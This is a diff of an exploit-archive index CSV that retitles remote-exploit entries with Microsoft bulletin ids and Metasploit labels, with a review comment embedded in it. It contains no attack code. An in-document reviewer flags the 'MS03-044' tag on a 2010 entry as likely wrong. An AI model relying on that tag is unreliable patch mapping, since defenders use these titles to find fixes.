 2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411
 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80
 2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143
-2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
+2355,platforms/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer - COM Object Remote Heap Overflow",2006-09-13,nop,windows,remote,0
 2401,platforms/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - (PASV Response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0
 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow",2006-09-20,nop,windows,remote,0
@@ -9174,13 +9183,13 @@ id,file,description,date,author,platform,type,port 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 -2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 +2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 -2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python)",2006-11-18,"Winny Thomas",windows,remote,445 +2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - (PLS) Local+Remote Buffer 
Overflow",2006-11-21,"Greg Linares",windows,remote,0 2837,platforms/multiple/remote/2837.sql,"Oracle 9i / 10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 @@ -9357,8 +9366,8 @@ id,file,description,date,author,platform,type,port 4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",windows,remote,0 -4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow",2007-06-13,rgod,windows,remote,0 -4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow",2007-06-13,rgod,windows,remote,0 +4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote,0 +4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote,0 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - (EXEC) Remote Command Execution",2007-06-21,clarity_,linux,remote,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 
@@ -9421,7 +9430,7 @@ id,file,description,date,author,platform,type,port
 4348,platforms/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0
 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0
 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0
-4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0
+4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)",2007-09-03,"Patrick Webster",windows,remote,0
 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0
 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0
 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote,0
@@ -9486,7 +9495,7 @@ id,file,description,date,author,platform,type,port
 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
-4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
+4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",hardware,remote,0
@@ -9510,7 +9519,7 @@ id,file,description,date,author,platform,type,port
 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Buffer Overflow",2008-01-16,rgod,windows,remote,0
 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0
 4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0
-4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow",2008-01-18,"Marcin Kozlowski",windows,remote,0
+4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2008-01-18,"Marcin Kozlowski",windows,remote,0
 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0
 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0
 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0
@@ -9947,7 +9956,7 @@ id,file,description,date,author,platform,type,port
 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022
 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0
 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote,0
-9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC)",2009-10-15,Skylined,windows,remote,80
+9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)",2009-10-15,Skylined,windows,remote,80
 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,windows,remote,80
 9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80
@@ -10160,7 +10169,7 @@ id,file,description,date,author,platform,type,port
 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
 13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080
 13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - (PoC)",2010-06-09,Unknown,multiple,remote,0
-13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0
+13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote,0
 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0
 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0
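Review bot: The tag added to row 13808, `(MS03-044)`, does not fit the row's own date of 2010-06-10: the two digits after `MS` are the bulletin year, and a 2003 bulletin cannot be the fix for an advisory dated 2010. It looks as if the tag was matched on the Help Centre product name rather than on this issue, so please check it against Microsoft's bulletin index and use the MS10-series bulletin that covers it, or leave the tag off until it is confirmed. A wrong bulletin id is worse than none here, because defenders use the title to map an entry to the patch that closes it.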
@@ -10232,7 +10241,7 @@ id,file,description,date,author,platform,type,port
 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0
-14886,platforms/windows/remote/14886.py,"Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0
+14886,platforms/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0
 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (2)",2010-09-03,Abysssec,windows,remote,0
 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Exploit",2010-11-17,Dr_IDE,windows,remote,0
 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0
@@ -10250,7 +10259,7 @@ id,file,description,date,author,platform,type,port
 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
 15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote,0
 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0
-15213,platforms/asp/remote/15213.pl,"ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0
+15213,platforms/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow",2010-10-11,"xsploited security",windows,remote,0
@@ -10258,10 +10267,10 @@ id,file,description,date,author,platform,type,port
 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow",2010-10-12,"xsploited security",windows,remote,0
 15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Parameter Buffer Overflow",2010-10-13,Skylined,windows,remote,0
 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0
-15265,platforms/asp/remote/15265.rb,"ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0
-15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0
+15265,platforms/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0
+15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",windows,remote,0
 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
-15292,platforms/windows/remote/15292.rb,"ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
+15292,platforms/windows/remote/15292.rb,"Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory Corruption",2010-10-21,Abysssec,windows,remote,0
 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0
 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
@@ -10360,7 +10369,7 @@ id,file,description,date,author,platform,type,port
 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0
 16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0
 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
-16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",2010-11-24,Metasploit,multiple,remote,0
+16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0
 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank 'file://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
 16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
@@ -10376,12 +10385,12 @@ id,file,description,date,author,platform,type,port 16305,platforms/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation (Metasploit)",2010-09-27,Metasploit,multiple,remote,0 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 -16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 -16310,platforms/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 +16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)",2010-09-20,Metasploit,multiple,remote,0 +16310,platforms/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String (Metasploit)",2010-11-30,Metasploit,linux,remote,0 -16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 +16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16314,platforms/multiple/remote/16314.rb,"Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 -16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 +16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) 
(Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote,0 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0 
@@ -10399,8 +10408,8 @@ id,file,description,date,author,platform,type,port
 16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0
 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (Metasploit)",2010-04-28,Metasploit,windows,remote,0
-16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote,0
+16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow Exploit (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0
 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@@ -10421,30 +10430,30 @@ id,file,description,date,author,platform,type,port
 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16354,platforms/windows/remote/16354.rb,"Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
-16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0
-16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0
-16357,platforms/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
+16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
+16357,platforms/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16358,platforms/windows/remote/16358.rb,"Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16359,platforms/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16360,platforms/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution (Metasploit)",2010-09-21,Metasploit,windows,remote,0
-16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0
-16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0
-16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit)",2010-09-28,Metasploit,windows,remote,0
-16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit)",2011-02-17,Metasploit,windows,remote,0
-16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066)",2010-05-09,Metasploit,windows,remote,0
+16359,platforms/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16360,platforms/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)",2010-09-21,Metasploit,windows,remote,0
+16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)",2011-02-17,Metasploit,windows,remote,0
+16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)",2011-01-21,Metasploit,windows,remote,0
+16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)",2010-07-03,Metasploit,windows,remote,0
+16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow Exploit (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote,0
+16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)",2011-02-17,Metasploit,windows,remote,0
+16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)",2010-07-03,Metasploit,windows,remote,0
+16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
-16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066)",2010-08-25,Metasploit,windows,remote,0
+16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote,0
+16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,windows,remote,0
+16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,windows,remote,0
 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,windows,remote,0
-16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0
+16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)",2010-08-25,Metasploit,windows,remote,0
 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
-16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)",2010-07-25,Metasploit,windows,remote,0
-16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
+16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC - Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
